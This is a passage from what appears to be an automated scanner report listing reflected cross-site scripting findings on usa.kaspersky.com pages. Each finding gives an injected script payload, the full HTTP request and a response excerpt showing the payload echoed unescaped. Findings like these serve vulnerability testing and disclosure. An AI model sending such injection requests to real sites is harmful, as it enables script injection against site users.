<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-trials/free-home-trials?68cd1"><script>alert(1)</script>48d4db416d5=1" />
...[SNIP]...

1.76. http://usa.kaspersky.com/downloads/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa34d"-alert(1)-"c8a4f6bc521 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloadsfa34d"-alert(1)-"c8a4f6bc521/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:18:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685505"
Content-Type: text/html; charset=utf-8
Content-Length: 30057
Date: Sat, 18 Dec 2010 15:18:29 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloadsfa34d"-alert(1)-"c8a4f6bc521/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.77. http://usa.kaspersky.com/downloads/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f763"><script>alert(1)</script>bb6bea5b6fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads5f763"><script>alert(1)</script>bb6bea5b6fc/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:17:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685476"
Content-Type: text/html; charset=utf-8
Content-Length: 30152
Date: Sat, 18 Dec 2010 15:18:04 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads5f763"><script>alert(1)</script>bb6bea5b6fc/index.html" />
...[SNIP]...

1.78. http://usa.kaspersky.com/downloads/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db67d"-alert(1)-"3ed56c72ef4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/db67d"-alert(1)-"3ed56c72ef4 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:19:34 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685574"
Content-Type: text/html; charset=utf-8
Content-Length: 30138
Date: Sat, 18 Dec 2010 15:19:46 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/db67d"-alert(1)-"3ed56c72ef4";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.79. http://usa.kaspersky.com/downloads/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91434"><script>alert(1)</script>4a3538b2dea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/91434"><script>alert(1)</script>4a3538b2dea HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:19:12 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685552"
Content-Type: text/html; charset=utf-8
Content-Length: 30235
Date: Sat, 18 Dec 2010 15:19:21 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/91434"><script>alert(1)</script>4a3538b2dea" />
...[SNIP]...

1.80. http://usa.kaspersky.com/downloads/product-downloads/anti-virus-for-mac [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/anti-virus-for-mac

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca89b"><script>alert(1)</script>c7c362c50f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsca89b"><script>alert(1)</script>c7c362c50f2/product-downloads/anti-virus-for-mac HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:32:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686360"
Content-Type: text/html; charset=utf-8
Content-Length: 30325
Date: Sat, 18 Dec 2010 15:32:47 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloadsca89b"><script>alert(1)</script>c7c362c50f2/product-downloads/anti-virus-for-mac" />
...[SNIP]...

1.81. http://usa.kaspersky.com/downloads/product-downloads/anti-virus-for-mac [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/anti-virus-for-mac

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74f68"-alert(1)-"5df27f778a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads74f68"-alert(1)-"5df27f778a6/product-downloads/anti-virus-for-mac HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:33:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686394"
Content-Type: text/html; charset=utf-8
Content-Length: 38412
Date: Sat, 18 Dec 2010 15:33:22 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads74f68"-alert(1)-"5df27f778a6/product-downloads/anti-virus-for-mac";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.82. http://usa.kaspersky.com/downloads/product-downloads/anti-virus-for-mac [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/anti-virus-for-mac

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9baf"-alert(1)-"5e1a64dc15a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/product-downloadsc9baf"-alert(1)-"5e1a64dc15a/anti-virus-for-mac HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:35:32 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686532"
Content-Type: text/html; charset=utf-8
Content-Length: 38536
Date: Sat, 18 Dec 2010 15:35:38 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
hank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/product-downloadsc9baf"-alert(1)-"5e1a64dc15a/anti-virus-for-mac";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.83. http://usa.kaspersky.com/downloads/product-downloads/anti-virus-for-mac [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/anti-virus-for-mac

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ef4f"><script>alert(1)</script>862e4085f5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloads1ef4f"><script>alert(1)</script>862e4085f5f/anti-virus-for-mac HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:35:04 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686504"
Content-Type: text/html; charset=utf-8
Content-Length: 30451
Date: Sat, 18 Dec 2010 15:35:10 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads1ef4f"><script>alert(1)</script>862e4085f5f/anti-virus-for-mac" />
...[SNIP]...

1.84. http://usa.kaspersky.com/downloads/product-downloads/anti-virus-for-mac [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/anti-virus-for-mac

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed77b"><script>alert(1)</script>778564304ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloads/anti-virus-for-maced77b"><script>alert(1)</script>778564304ad HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:37:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686653"
Content-Type: text/html; charset=utf-8
Content-Length: 30451
Date: Sat, 18 Dec 2010 15:37:41 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads/anti-virus-for-maced77b"><script>alert(1)</script>778564304ad" />
...[SNIP]...

1.85. http://usa.kaspersky.com/downloads/product-downloads/anti-virus-for-mac [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/anti-virus-for-mac

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6a50"-alert(1)-"09a52dd03dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/product-downloads/anti-virus-for-maca6a50"-alert(1)-"09a52dd03dd HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:37:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686674"
Content-Type: text/html; charset=utf-8
Content-Length: 39292
Date: Sat, 18 Dec 2010 15:37:59 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
Name = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/product-downloads/anti-virus-for-maca6a50"-alert(1)-"09a52dd03dd";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.86. http://usa.kaspersky.com/downloads/product-downloads/anti-virus-for-mac [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/anti-virus-for-mac

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8ce"><script>alert(1)</script>dbd02fd99aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloads/anti-virus-for-mac?cd8ce"><script>alert(1)</script>dbd02fd99aa=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:30:11 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686211"
Content-Type: text/html; charset=utf-8
Content-Length: 31966
Date: Sat, 18 Dec 2010 15:30:22 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads/anti-virus-for-mac?cd8ce"><script>alert(1)</script>dbd02fd99aa=1" />
...[SNIP]...

1.87. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-anti-virus [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-anti-virus

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6b9b"><script>alert(1)</script>36515133b3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsc6b9b"><script>alert(1)</script>36515133b3e/product-downloads/kaspersky-anti-virus HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:32:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686360"
Content-Type: text/html; charset=utf-8
Content-Length: 30337
Date: Sat, 18 Dec 2010 15:32:47 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloadsc6b9b"><script>alert(1)</script>36515133b3e/product-downloads/kaspersky-anti-virus" />
...[SNIP]...

1.88. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-anti-virus [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-anti-virus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c05ef"-alert(1)-"db233ee5bea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloadsc05ef"-alert(1)-"db233ee5bea/product-downloads/kaspersky-anti-virus HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:33:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686388"
Content-Type: text/html; charset=utf-8
Content-Length: 39092
Date: Sat, 18 Dec 2010 15:33:14 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
